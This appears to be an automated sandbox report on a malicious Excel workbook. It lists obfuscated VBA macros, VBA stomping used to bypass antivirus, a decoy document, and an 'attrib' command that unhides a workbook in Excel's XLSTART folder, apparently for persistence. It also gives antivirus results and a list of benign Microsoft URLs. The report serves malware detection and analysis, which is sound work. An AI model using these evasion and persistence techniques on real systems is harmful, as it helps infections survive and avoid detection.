Source: ~DFB6A3757021F38DB9.TMP.0.drBinary or memory string: ,wb.VBProject.References.AddFrom@Guid _
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{EFB504DD-97EF-4074-A855-29B736BB42A9} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal100.expl.evad.winXLS@12/4@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: fWWE9vHC67.xlsStatic file information: File size 1879552 > 1048576
Source: fWWE9vHC67.xlsInitial sample: OLE summary codepage = 1200
Source: fWWE9vHC67.xlsInitial sample: OLE document summary codepagedoc = 1200
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: fWWE9vHC67.xlsInitial sample: OLE summary lastprinted = 2021-06-01 08:25:41
Source: ~DFB6A3757021F38DB9.TMP.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: fWWE9vHC67.xlsStream path '_VBA_PROJECT_CUR/VBA/ToDOLE' : High number of string operations
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ToDOLEName: ToDOLE
Source: k4.xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ToDOLE' : High number of string operations

Hooking and other Techniques for Hiding and Protection

barindex
Creates and opens a fake document (probably a fake document to hide exploiting)
Source: C:\Windows\SysWOW64\cmd.exeProcess created: cmd line: k4.xlsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: k4.xlsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: k4.xlsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: k4.xlsJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: fWWE9vHC67.xlsStream path 'Workbook' entropy: 7.9513428229 (max. 8.0)
Source: k4.xls.0.drStream path 'Workbook' entropy: 7.953098335 (max. 8.0)
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed

HIPS / PFW / Operating System Protection Evasion

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Source: k4.xls.0.drOLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"Jump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		Path Interception11
Process Injection		1
Masquerading		OS Credential Dumping1
File and Directory Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts62
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Process Injection		LSASS Memory3
System Information Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts2
Exploitation for Client Execution		Logon Script (Windows)Logon Script (Windows)62
Scripting		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
Obfuscated Files or Information		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 800337 Sample: fWWE9vHC67.xls Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 25 Malicious sample detected (through community Yara rule) 2->25 27 Antivirus / Scanner detection for submitted sample 2->27 29 Multi AV Scanner detection for submitted file 2->29 31 9 other signatures 2->31 7 EXCEL.EXE 28 25 2->7         started        process3 signatures4 33 Creates and opens a fake document (probably a fake document to hide exploiting) 7->33 10 cmd.exe 1 7->10         started        13 cmd.exe 1 7->13         started        15 cmd.exe 1 7->15         started        process5 signatures6 35 Creates and opens a fake document (probably a fake document to hide exploiting) 10->35 17 conhost.exe 10->17         started        19 attrib.exe 1 10->19         started        21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        process7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
fWWE9vHC67.xls82%ReversingLabsDocument-Excel.Virus.MailCab
fWWE9vHC67.xls74%VirustotalBrowse
fWWE9vHC67.xls100%AviraX97M/Agent.87966132
fWWE9vHC67.xls100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://d.docs.live.net0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://make.powerautomate.com0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
    		high
    https://login.microsoftonline.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
      		high
      https://shell.suite.office.com:1443D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
        		high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
          		high
          https://autodiscover-s.outlook.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
            		high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
              		high
              https://cdn.entity.D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
              • URL Reputation: safe
              		unknown
              https://api.addins.omex.office.net/appinfo/queryD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                		high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                  		high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                    		high
                    https://powerlift.acompli.netD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://lookup.onenote.com/lookup/geolocation/v1D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                      		high
                      https://cortana.aiD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspxD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                            		high
                            https://entitlement.diagnosticssdf.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                		high
                                https://api.aadrm.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                  		high
                                  https://api.microsoftstream.com/api/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                      		high
                                      https://cr.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                        		high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://portal.office.com/account/?ref=ClientMeControlD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                          		high
                                          https://graph.ppe.windows.netD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                            		high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://powerlift-frontdesk.acompli.netD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://tasks.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                		high
                                                https://api.scheduler.D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://my.microsoftpersonalcontent.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://store.office.cn/addinstemplateD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.aadrm.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                  		high
                                                  https://globaldisco.crm.dynamics.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                    		high
                                                    https://messaging.engagement.office.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                        		high
                                                        https://dev0-api.acompli.net/autodetectD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.odwebp.svc.msD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedbackD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                          		high
                                                          https://api.powerbi.com/v1.0/myorg/groupsD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                              		high
                                                              https://api.addins.store.officeppe.com/addinstemplateD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://graph.windows.netD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                		high
                                                                https://dataservice.o365filtering.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://officesetup.getmicrosoftkey.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://analysis.windows.net/powerbi/apiD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                  		high
                                                                  https://prod-global-autodetect.acompli.net/autodetectD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                    		high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                      		high
                                                                      https://consent.config.office.com/consentcheckin/v1.0/consentsD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                        		high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                          		high
                                                                          https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                            		high
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                              		high
                                                                              https://d.docs.live.netD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://ncus.contentsync.D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                		high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                  		high
                                                                                  http://weather.service.msn.com/data.aspxD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                    		high
                                                                                    https://apis.live.net/v5.0/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                      		high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                        		high
                                                                                        https://messaging.lifecycle.office.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                          		high
                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                            		high
                                                                                            https://pushchannel.1drv.msD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                              		high
                                                                                              https://management.azure.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                		high
                                                                                                https://outlook.office365.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                  		high
                                                                                                  https://wus2.contentsync.D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://incidents.diagnostics.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/iosD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                      		high
                                                                                                      https://make.powerautomate.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                        		high
                                                                                                        https://o365auditrealtimeingestion.manage.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                            		high
                                                                                                            https://api.office.netD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                              		high
                                                                                                              https://incidents.diagnosticssdf.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                		high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policiesD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                  		high
                                                                                                                  https://entitlement.diagnostics.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                    		high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                      		high
                                                                                                                      https://substrate.office.com/search/api/v2/initD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                        		high
                                                                                                                        https://outlook.office.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                          		high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocationD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                              		high
                                                                                                                              https://webshell.suite.office.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                		high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://management.azure.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://messaging.lifecycle.office.com/getcustommessage16D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://clients.config.office.net/c2r/v1.0/InteractiveInstallationD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://graph.windows.net/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://api.powerbi.com/beta/myorg/importsD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://devnull.onenote.comD4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://messaging.action.office.com/D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442.0.drfalse
                                                                                                                                                    		high

                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                    No contacted IP infos

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                    Analysis ID:800337
                                                                                                                                                    Start date and time:2023-02-07 11:36:09 +01:00
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 11m 45s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:28
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • GSI enabled (VBA)
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample file name:fWWE9vHC67.xls
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.expl.evad.winXLS@12/4@0/0
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Unable to detect Microsoft Excel
                                                                                                                                                    • Close Viewer

                                                                                                                                                    Errors

                                                                                                                                                    • Corrupt sample or wrongly selected analyzer.

                                                                                                                                                    Warnings

                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.32.24, 20.231.71.84, 20.224.224.21
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, login.live.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, settings-win.data.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASNs

                                                                                                                                                    No context

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

